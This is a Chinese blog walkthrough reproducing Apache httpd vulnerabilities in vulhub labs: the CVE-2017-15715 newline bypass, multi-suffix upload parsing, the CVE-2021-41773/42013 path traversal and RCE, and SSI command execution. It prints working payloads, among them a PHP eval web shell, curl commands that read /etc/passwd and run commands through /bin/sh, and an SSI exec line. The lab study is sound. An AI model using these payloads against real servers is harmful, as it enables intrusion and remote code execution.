Apache 漏洞复现(vulhub)全

最新推荐文章于 2025-04-23 22:59:22 发布
原创 最新推荐文章于 2025-04-23 22:59:22 发布 · 1k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#apache

APACHE HTTPD 换行解析漏洞(CVE-2017-15715)

  1. 漏洞详情

Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。 其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。1.php\x0A

原因:apache这次解析漏洞的根本原因就是这个 $,正则表达式中,我们都知道$用来匹配字符串结尾位置,我们来看看菜鸟教程中对正则表达符$的解释:

匹配输入字符串的结尾位置。如果设置了 RegExp 对象的 Multiline 属性,则 $ 也匹配 '\n' 或 '\r'。要匹配 $ 字符本身,请使用 $。

那么就明白了,在设置了 RegExp 对象的 Multiline 属性的条件下,$还会匹配到字符串结尾的换行符

  1. 影响版本

Apache  2.4.0~2.4.29

  1. 漏洞复现

image-20250311210347032

抓包观察

ed27c10cdc924fb5a792c5bfab256b47

我们可以看到,是被拦截的

65225f6ab23e6450d624b0b122780c14

我们现在evil.php后面加个空格(0x20),以方便我们区分位置

213c503c84379b9e0bd97d925d94fb25

我们将%20改成%0a 这里%0a是换页符

36d664672974b998afc8156c880054a4

修改完之后我们点击发送

086ade9735c4ce1d69e0289d7da2ace8

可以看到已经上传成功了

我们直接访问后门地址,记得后门地址也是需要加上%0a

image-20250311211427163

image-20250311211604296

image-20250311211642429

APACHE多后缀解析漏洞

  1. 漏洞详情

Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。在有多个后缀的情况下,只要一个文件含有后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。

  1. 漏洞复现

image-20250311201701721

此漏洞只允许上传gif、png、jpg、jpeg后缀的文件,所以当上传php文件时会报错

后门

<?php @eval($_POST['shell']);?>

上传抓包

b7656f5996a521ca231987fd0bb63f6b

此时我们需要在文件后缀添加允许上传的后缀

8cee2af5b6e9c218734a265e9c82f2b0

58ece16175ae905607787833656ccb3a

文件上传成功访问后门地址

64bd83b5e009edbf53d820c3c876313f

返回空白说明该地址存在后门,使用蚁剑连接

13c470f13c82ff38010896ac9f5ed9da

APACHE HTTP SERVER 2.4.49路径穿越漏洞(CVE-2021-41773)

  1. 漏洞详情

Apache HTTP Server 2.4.49 中的路径规范化所做的更改中发现一个缺陷。攻击者可利用路径遍历攻击将 URL 映射到预期文档根目录之外的文件。

如果这些目录之外的文件不受通常的默认配置“require all denied”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程执行代码。

  1. 影响版本

Apache HTTP Server 2.4.49

  1. 漏洞复现

image-20250312222107234

curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

image-20250312223114108

在靶机中访问此文件,确认攻击机成功读取到 passwd

RCE(利用CVE-2021-41773)

curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

image-20250312222854449

APACHE HTTP SERVER 2.4.50 路径穿越漏洞(CVE-2021-42013)

  1. 漏洞详情

CVE-2021-42013 是由 CVE-2021-41773 修复不完整所致的漏洞,攻击者可能使用路径遍历攻击将 URL 映射到类似别名指令配置的目录之外的文件。

  1. 影响版本

Apache HTTP Server 2.4.49 和 2.4.50

  1. 漏洞复现

我们使用CVE-2021-41773中的Payload已经无法成功利用漏洞了,说明2.4.50进行了修复。

但我们可以使用.%%32%65进行绕过(注意其中的/icons/必须是一个存在且可访问的目录):

curl -v --path-as-is http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
​

image-20250312224549654

可见,成功读取到/etc/passwd

RCE

curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

image-20250312224739827

APACHE SSI 远程命令执行漏洞

  1. 漏洞详情

在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用语法执行任意命令。

成因

SSI提供了一种对现有HTML文档增加动态内容的方法,即在html中加入动态内容。

SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。

从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意命令。

在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用<!--#exec cmd="ls /" -->语法执行任意命令。

  1. 漏洞复现

image-20250312225212730

我们尝试上传一个php文件,可以看到提示不支持的上传的类型

image-20250312225348656

那我们上传一个shell.shtml文件,里面写入以下内容:

<!--#exec cmd="id" -->

image-20250312225524012

image-20250312225621320

可以看到shtml后缀文件上传成功

image-20250312225701824

访问shell.shtml文件,命令执行成功,我们此时也可以写一个反弹shell,这里不在演示

Apache2.4.23--解析漏洞
willow_liang的博客
10-21 5712
复现环境: Apache文件解析漏洞与用户的配置有密切关系,严格来说属于用户配置问题。Apache文件解析漏洞涉及到一个解析文件的特性。Apache默认- -个文件可以有多个以点分隔的后缀,当右边的后缀无法识别,则继续向左识别,发现后缀是;php,交给php处理这个文件。 如下图中的shell.php.001。最后的001后缀无法识别,就向左进行识别,发现Php,就会解析成为php文件 漏洞修复: 在httpd.conf或httpd-vhosts.conf中加入以下语句,从而禁止文件名格式为*.php
[中间件漏洞]apache漏洞复现
紫洋的博客
05-25 1514
2.4.0~2.4.29版本中存在 一个解析漏洞,在解析PHP时,1.php\x0a将被按照PHP后缀进行解析,导致绕过一些服务器的安策略。Apache默认一个文件可以有多个以点分割的后缀,当最右边的后缀无法识别,则继续向左识别,直到识别到合法后缀才进行解析。最后一个后缀名为.jpg,合法,因为文件名info.php.jpg中包含.php,所以解析为php文件。在有多个后缀的情况下,只要包含.php后缀的文件就会被识别出php文件进行解析,不需要是最后一个后缀。先创建文件,文件内容为phpinfo。
Apache 漏洞
weixin_53736204的博客
08-06 669
漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录 Require all granted允许被访问的的情况下(默认开启),攻击者可利⽤该路 径穿越漏洞读取到Web⽬录之外的其他⽂件。在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)
Apache中间件解析漏洞与安加固
最新发布
w2361734601的博客
04-23 1135
Apache的安性依赖于对解析逻辑的严格管控和纵深防御体系的构建。运维人员需定期审计配置(如检查.htaccess权限)、模拟渗透测试(使用OWASP ZAP等工具),并通过模块精简、权限最小化持续优化防护策略。正如安领域的“木桶效应”,只有补齐每一块短板,才能确保服务器在复杂威胁环境下的稳健运行。
Apache文件上传漏洞
guishengyx的博客
10-19 454
vulfocus靶场
Apache Struts2文件上传漏洞来袭,网御星云提供优选解决方案,从零基础到精通,收藏这篇就够了!
Javachichi的博客
12-26 932
2024年12月,网御星云监测到Apache官方发布漏洞风险通告,在远程服务器代码中使用了FileUploadInterceptor作为文件上传组件时,Apache Struts在文件上传逻辑中存在漏洞。3)添加“L3_Apache Struts2文件上传漏洞”,条件日志名称等于或包含“L2_Apache Struts2文件上传漏洞”,攻击结果等于“攻击成功”,目的地址引用资产漏洞或源地址匹配威胁情报,从而提升关联规则的置信度。(1)“网御漏洞扫描系统V6.0”产品已支持对该漏洞进行扫描。
漏洞复现-Apache-文件上传】vulfocus/apache-cve_2017_15715
10-09 3254
Apache-文件上传】
apache2.4.18
03-27
linux 编译通过,可以使用,编译时需要依赖库apr,apr-iconv,apr-util,openssl,pcre
vulhub靶场】Apache 中间件漏洞复现
M372109150的博客
05-10 2554
本文主要是对apache中间件漏洞复现,包括Apache HTTPD 换行解析漏洞(CVE-2017-15715)、Apache多后缀解析漏洞apache_parsing_vulnerability)、Apache路径穿越漏洞(CVE-2021-41773)、Apache路径穿越漏洞(CVE-2021-42013)、Apache SSI 远程命令执行漏洞
简单了解cms,复现vulhub中的wordpress漏洞
weixin_64655821的博客
09-12 1183
简单了解cms,复现vulhub中的wordpress漏洞
Vulhub:Shiro[漏洞复现]
如有错误感谢斧正
12-07 1285
Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。在Apache Shiro 1.1.0以前的版本中,shiro 进行权限验证前未对url 做标准化处理,攻击者可以构造`/`、`//`、`/./`、`/../` 等绕过权限验证。在Apache Shiro 1.5.2以前的版本中,在使用Spring动态控制器时,攻击者通过构造`..;服务启动后,访问`http://your-ip:8080`可使用`admin:vulhub`进行登录。
漏洞复现Vulhub)-Apache HTTPD 换行解析漏洞(CVE-2017-15715)
qq_60848021的博客
09-20 1460
原理:apache-CVE-2017-15715 的出现是由于apache 在修复第一个后缀名解析漏洞时,使用 正则表达式匹配后缀,在解析php时xxx.php\\x0A 将被php后缀进行解析,导致绕过一些服务器的安策略。命令含义:--zone #作用域 --add-port=80/tcp #添加端口,格式为:端口/通讯协议 --permanent #永久生效,没有此参数重启后失效。firewall-cmd --list-ports 查看所有开启的端口。成功出现php配置文件界面,说明解析成功。
最新Apache漏洞分析
二狗的博客
12-30 2977
2021年9月16日,Apache官方发布了Apache httpd mod_proxy SSRF漏洞CVE-2021-40438,影响v2.4.48及以下版本。该漏洞影响范围较广,危害较大,利用简单,不得不引起重视。该ssrf代理访问漏洞适用于apache的绝大多是版本,相对来说漏洞原理比较简单,隐藏了多年也是很不容易了,至于危害的话,笔者认为危害还是挺大的,可以访问到服务器内部一些不对外开放的http端口及uds文件。
Apache httpd 出现多个漏洞 可能引发DoS攻击 2.2.x及2.4.x版本受影响
weixin_34004576的博客
09-01 5171
近日,Apache 官方发布了httpd的新版本修复了多个安漏洞,涉及CVE-2017-3167,CVE-2017-3169,CVE-2017-7659,CVE-2017-7668,CVE-2017-7679,可以造成身份验证被绕过以及拒绝服务攻击等。大部分Apache httpd 2.2.x以及2.4.x版本均受影响。相关漏洞信息如下: CVE...
Apache2.4.18编辑出现的错误
04-20 191
错误提示: 在apache2.4.18make 的时候出现: make[2]:***[exports.lo]错误1 make[2]:Leavingdirectory`/usr/local/src/httpd-2.4.18/server' ma...
Apache中间件漏洞复现
mingyqf的博客
02-13 1911
kali复现apache未知扩展名解析漏洞 2. 复现 我上传了一个名字叫shell.php.aaa 的文件,当此特性存在的时候,一看.aaa不认识, 继续解析,.php我认识,解析成php文件了。访问也是同理,比如访问phpinfo.php.qqq可成功显示phpinfo 那么哪些后缀Apache不认识? 不在mime.types当中的都不认识 (Multipurpose Internet Mail Extensions) sudo service apache2 restart cd /etc/apac
中间件安Apache常见漏洞
Innocence_0的博客
07-08 1232
简单介绍一下apache是什么,Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机上,由于其跨平台和安性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将python等解释器编译到服务器中。ApacheHTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安策略。apache
【Web安】文件上传漏洞
RexHa的博客
12-04 4030
目录1. 文件上传漏洞概述1.1 FCKEditor文件上传漏洞1.2 绕过文件上传检查功能2. 功能还是漏洞2.1 Apache文件解析2.2 IIS文件解析2.3 PHP CGI路径解析2.4 利用上传文件钓鱼 3. 设计安的文件上传功能文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务端命令的能力。应用:例如上传一张图片、分享一段视频、论坛发帖时附带附件、发邮件时附带附件……文件上传后导致的安问题一般有:FCKEditor是一款非常流行的富文本编辑器,其上传文件的功能能
apache漏洞复现-多后缀解析漏洞,换行解析漏洞2.4.49,2.4.50
weixin_64655821的博客
10-13 2291
apache漏洞复现-多后缀解析漏洞,换行解析漏洞2.4.49,2.4.50
vulhub靶场cve漏洞复现文件上传
01-04
### Vulhub CVE 漏洞复现中的文件上传实验 #### Apache HTTPD 换行解析漏洞(CVE-2017-15715) 在处理文件上传的过程中,Apache HTTPD 的换行符解析存在缺陷。攻击者可以通过精心构造的HTTP请求来绕过安机制并执行恶意操作[^1]。 对于该漏洞的具体实现方式,在构建测试环境时需准备如下组件: - 安装 Docker 和 Git 工具; - 使用 `git clone` 命令克隆 vulhub 项目仓库到本地机器上; ```bash git clone https://github.com/vulhub/vulhub.git ``` 接着进入对应的漏洞案例路径下启动容器服务: ```bash cd vulhub/httpd/CVE-2017-15715/ docker-compose up -d ``` 完成上述配置之后即可访问指定端口验证是否存在此问题,并尝试通过POST方法提交含有特殊字符的数据包来进行进一步探索。 #### Nginx 解析漏洞下的文件上传场景(CVE-2023-21839) 针对Nginx服务器存在的特定版本解析错误,可以利用其对PHP脚本不当处理的特点实施攻击行为。当满足一定条件下,能够使远程未经身份验证的用户向Web应用程序发送特制请求从而获取反序列化对象的能力,最终达到命令注入的效果[^2]。 为了重现这一过程,建议按照官方给出的操作指南搭建模拟平台: 同样先拉取最新版源码库至工作区, ```bash git clone https://github.com/vulhub/vulhub.git ``` 定位到目标位置激活所需的服务实例: ```bash cd vulhub/nginx/CVE-2023-21839/ docker-compose up -d ``` 此时应该能看到一个简易的表单页面允许我们上传任意类型的文档。借助于已公开发布的Exploit工具集可快速获得反弹Shell连接权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值